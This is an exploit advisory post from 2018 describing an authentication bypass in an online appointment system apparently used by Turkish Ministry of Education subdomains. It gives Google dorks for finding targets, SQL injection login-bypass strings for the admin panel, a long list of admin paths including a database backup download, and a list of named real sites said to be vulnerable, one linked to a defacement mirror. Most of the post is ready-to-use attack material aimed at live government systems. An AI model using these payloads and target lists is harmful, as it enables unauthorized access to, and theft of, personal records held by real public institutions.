facebook facebook twitter rss

Ministry of Education TR *.subdomains Online Appointment Atom Computers Unauthenticated Access Control Vulnerability

Author: KingSkrupellos , Published: 15-10-2018
# Exploit Title : Ministry of Education TR *.subdomains Online Appointment Atom Computers Unauthenticated Access Control Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 15/10/2018
# Vendor Homepage : atombilgisayar.com.tr
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork :
intext:''Webmaster Atom Bilgisayar Yazılım Danışmanllık'' site:meb.gov.tr
inurl:''/randevu/index.php?sayfa=rapor'' site:meb.gov.tr
inurl:''/randevu/index.php?sayfa=iletisim'' site:meb.gov.tr
# Exploit Risk : Medium
# CWE : CWE-287 - [ Improper Authentication ] - CWE-592 - [ Authentication Bypass Issues ] -
CWE-284: Improper Access Control - + CWE-264 - [ Permissions, Privileges, and Access Controls ]

##########################################################################################################

# Admin Panel Login Path :

/randevu/admin/
/onlinerandevu/admin/

# Authentication Bypass Exploit :

Admin Username :

anything' OR 'x'='x

Admin Password :

anything' OR 'x'='x

You can try also this, too.

1' or 1=1 -- -
1' or 1=1 -- -

'=''or'
'=''or'

# Useable Admin Control Panel URL Links Exploits =>

/randevu/admin/index.php
/randevu/admin/index3.php
/randevu/admin/yedekal.php => SQL Database Backup Arbitrary File Download
/admin/randevu.xls
/onlinerandevu/admin/hasta.xls
/randevu/admin/sifre.php
/randevu/admin/resetle.php
/randevu/admin/index4.php
/randevu/admin/ogretmen.php
/randevu/admin/karar.php
/randevu/admin/egitsel.php
/randevu/admin/test.php
/randevu/admin/sebeb.php
/randevu/admin/tani.php
/randevu/admin/destek.php
/randevu/admin/oneri.php
/randevu/admin/index1.php
/randevu/admin/dr.php
/randevu/admin/saat.php
/randevu/admin/basvuru.php
/randevu/admin/sart.php
/randevu/admin/hastalik.php
/randevu/admin/site.php
/randevu/admin/ilce.php
/randevu/admin/okul.php
/randevu/admin/kademe.php
/randevu/admin/tatil.php
/randevu/admin/index5.php
/randevu/admin/randevu.php
/randevu/admin/liste.php
/randevu/admin/page1.php
/randevu/admin/rapor.php
/admin/admin.php?islem=randevu&randevu=listele
/admin/admin.php?islem=ogretmen
/admin/admin.php?islem=kullanici
/randevu/admin/admin.php?islem=tarih
/randevu/admin/admin.php?islem=saat
/randevu/admin/admin.php?islem=okul
/randevu/admin/admin.php?islem=randevu&randevu=dokum_ver
/randevu/admin/admin.php?islem=randevu&randevu=arsiv
/randevu/admin/admin.php?islem=randevu&randevu=reddedilen
/randevu/admin/admin.php?islem=randevu&randevu=rezerve

# Directory Paths =>

/randevu/index.php?sayfa=iletisim
/randevu/index.php?sayfa=iptal
/randevu/index.php?sayfa=sorgu
/randevu/index.php?sayfa=rapor
/randevu/index.php?sayfa=%F6gretmen%20giri%FEi

##########################################################################################################

Example Vulnerable Sites *.subdomains of meb.gov.tr =>

bucaram.meb.gov.tr/randevu/admin/ => [ Proof of Concept ] => zone-h.org/mirror/id/31762392
randevu.atombilgisayar.com.tr/admin/
fatsaram.meb.gov.tr/randevu/admin/
adiyamanram.meb.gov.tr/randevu/admin/
tavsanliram.meb.gov.tr/randevu/admin/
sokeram.meb.gov.tr/randevu/admin/
sancakteperam.meb.gov.tr/randevu/admin/
pendikram.meb.gov.tr/randevu/admin/
kilisram.meb.gov.tr/randevu/admin/
kcekmeceram.meb.gov.tr/randevu/admin/
esenlerram.meb.gov.tr/randevu/admin/
bakirkoyram.meb.gov.tr/randevu/admin/
bahcelievlerram.meb.gov.tr/randevu/admin/
arnavutkoyram.meb.gov.tr/randevu/admin/
boluram.meb.gov.tr/randevu/admin/

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :